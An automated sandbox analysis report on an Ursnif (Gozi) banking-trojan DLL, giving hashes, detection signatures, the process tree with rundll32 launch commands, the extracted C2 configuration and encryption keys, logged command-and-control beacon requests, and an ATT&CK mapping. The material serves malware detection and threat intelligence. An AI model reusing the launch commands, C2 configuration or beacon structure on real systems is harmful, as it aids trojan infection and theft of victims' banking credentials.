
Windows Analysis Report 945.dll

Overview

General Information

Sample Name: 945.dll
Analysis ID: 448650
MD5: 9453981ab8e71981bea907b3f2d11395
SHA1: ca0f69ef71bf287bdd19a8a9811c1f0dd2ff50e6
SHA256: fa97cd35d76337ff4a523ebdd7f879359a70432a14b7377f06df29c4679b3f70
Tags: dll, gozi

Detection

Ursnif
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5904 cmdline: loaddll32.exe 'C:\Users\user\Desktop\945.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5780 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5516 cmdline: rundll32.exe 'C:\Users\user\Desktop\945.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5784 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1048 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1112 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Sing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1636 cmdline: rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6084 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5208 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3672 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "ovNAU+HRorLZmwnDvbYFDY7UA+FTIAnF2uJSQd0M+N3ep6CVEhoDrEXACstP09QHK7cBl9nMAaFI1as0K4aXOQKngdScIQbDa3MQ98Ce9MYRMvxGUI05fSIRRFzMYffOXQr97vVUUUPjsYgfkDWS2eKPxSe5dz/pF0mjA0T8ibOLzHmVMs4vVv+nwVAw0xpD", "c2_domain": ["outlook.com", "auredosite.club", "vuredosite.club"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.392687998.0000000002ED8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.391393759.0000000004E68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.391313671.0000000004E68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000002.487967194.0000000002ED8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.391228461.0000000004E68000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview


            AV Detection:

            Found malware configuration
            Source: 00000002.00000003.298516419.00000000007A0000.00000040.00000001.sdmp, Malware Configuration Extractor: Ursnif (configuration identical to the one listed under Malware Configuration)
            Multi AV Scanner detection for submitted file
            Source: 945.dll, Metadefender: Detection: 22%
            Source: 945.dll, ReversingLabs: Detection: 58%
            Source: 945.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe, File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: 945.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\393_Molecule\skin\depend\supply\Thick\Drive.pdb source: loaddll32.exe, 00000000.00000002.493176321.000000006E234000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.495266949.000000006E234000.00000002.00020000.sdmp, 945.dll

            Networking:

            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49731 -> 40.97.116.82:80
            Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 37.120.222.6:80
            Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 37.120.222.6:80
            Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 37.120.222.6:80
            Source: Joe Sandbox View, IP Address: 40.97.128.194
            Source: Joe Sandbox View, IP Address: 52.97.232.194
            Source: global traffic, HTTP traffic detected:
              GET /grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7zv/NA3IFZsX5L82cDak57at8n5/D4Cfgi7tVz/ry3I5zo4IJ_2BIobC/5nWwD7akwp5A/XzqLAJr21mH/cjfkiJFlq9y77G/1bzeLjs6zco1VtNrrz8EL/tJlbiHzqPNR1Mami/EAf48einPLf/Q.grow HTTP/1.1
              Accept: text/html, application/xhtml+xml, image/jxr, */*
              Accept-Language: en-US
              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
              Accept-Encoding: gzip, deflate
              Host: outlook.com
              Connection: Keep-Alive
            Source: unknown, DNS traffic detected: queries for: outlook.com
            Source: ~DF64A2AAB8E5E3DF4B.TMP.19.dr, {7370D523-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.dr, String found in binary or memory: https://outlook.office365.com/grower/XdjQoGbnNj_2FSimi4F/g1n0hL2Ovi8UAiji8IT8vO/AZ50N9cBD7ouh/W9Stcu
            Source: rundll32.exe, 00000003.00000003.390626600.0000000002D64000.00000004.00000001.sdmp, ~DFEA5774EEA628D538.TMP.19.dr, {7370D521-E4F5-11EB-90E4-ECF4BB862DED}.dat.19.dr, String found in binary or memory: https://outlook.office365.com/grower/YjL_2BjDOrQaqruzKZl/J5qQT1PxhAWv_2ByqUpS3r/fw5c6vWOUvogF/fDf6v7
            Source: rundll32.exe, 00000003.00000002.490596255.0000000002CFA000.00000004.00000020.sdmp, String found in binary or memory: https://www.redtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            E-Banking Fraud:

            Yara detected Ursnif
            Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            System Summary:

            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMI
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exe, WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F1996 GetProcAddress,NtCreateSection,memset,0_2_6E1F1996
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F1A44 NtMapViewOfSection,0_2_6E1F1A44
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F23A5 NtQueryVirtualMemory,0_2_6E1F23A5
            Source: C:\Windows\System32\loaddll32.exe, Code function: String function: 6E223290 appears 39 times
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6E223290 appears 39 times
            Source: classification engine, Classification label: mal80.troj.winDLL@18/7@34/7
            Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
            Source: C:\Program Files\internet explorer\iexplore.exe, File created: C:\Users\user\AppData\Local\Temp\~DF08C928D5E36F5DDB.TMP
            Source: 945.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exe, File read: C:\Users\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\945.dll'
            Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
            Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Clockcondition
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
            Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Dogwhen
            Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Sing
            Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\945.dll,Wholegray
            Source: unknown, Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe, Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6084 CREDAT:17414 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 945.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 945.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 945.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 945.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 945.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 945.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,0_2_6E1F1BAC
            Source: 945.dll, Static PE information: real checksum: 0x6292a should be: 0x68280
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F2120 push ecx; ret 0_2_6E1F2129
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F2173 push ecx; ret 0_2_6E1F2183
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E21DE07 push ecx; ret 0_2_6E21DE1A
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E2232D5 push ecx; ret 0_2_6E2232E8
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E20103D push cs; ret 0_2_6E20103E
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E21DE07 push ecx; ret 3_2_6E21DE1A
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E203276 push ebx; ret 3_2_6E20328A
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E203244 pushad ; ret 3_2_6E203270
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E2232D5 push ecx; ret 3_2_6E2232E8
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E202AD8 push edx; retf 3_2_6E202AD9
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6E20103D push cs; ret 3_2_6E20103E

            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exe, Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E22AFAC ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E22AFAC
            Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_6E1F1BAC LoadLibraryA,GetProcAddress,0_2_6E1F1BAC
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]0_2_6E24E2D8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24E207 mov eax, dword ptr fs:[00000030h]0_2_6E24E207
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24DE0E push dword ptr fs:[00000030h]0_2_6E24DE0E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24E2D8 mov eax, dword ptr fs:[00000030h]3_2_6E24E2D8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24E207 mov eax, dword ptr fs:[00000030h]3_2_6E24E207
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24DE0E push dword ptr fs:[00000030h]3_2_6E24DE0E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E223484 GetProcessHeap,0_2_6E223484
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E21FEBA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21FEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E21FEBA
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\945.dll',#1
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.485745292.0000000000F70000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.491399399.0000000002FF0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,0_2_6E22EC14
            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E22EE88
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22EEC8
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22EF45
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22EFC8
            Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6E222C5A
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E222A26
            Source: C:\Windows\System32\loaddll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_6E22F2E7
            Source: C:\Windows\System32\loaddll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,0_2_6E22CB0D
            Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6E22AB64
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,0_2_6E22F394
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,0_2_6E21E036
            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_6E22D10F
            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E2229A0
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22F1BD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_6E22EC14
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_6E222C5A
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_6E22D10F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E22EE88
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E22EEC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_6E22EF45
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E22EFC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6E222A26
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6E22F2E7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,3_2_6E22CB0D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_6E22AB64
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_6E22F394
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,3_2_6E21E036
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6E2229A0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_6E22F1BD
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6E1F1ADA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1F1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E1F1F0E

            Stealing of Sensitive Information:

            Yara detected Ursnif
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            Remote Access Functionality:

            Yara detected Ursnif
            Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5904, type: MEMORY
            Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5516, type: MEMORY

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 12 | Masquerading 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Security Software Discovery 3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud
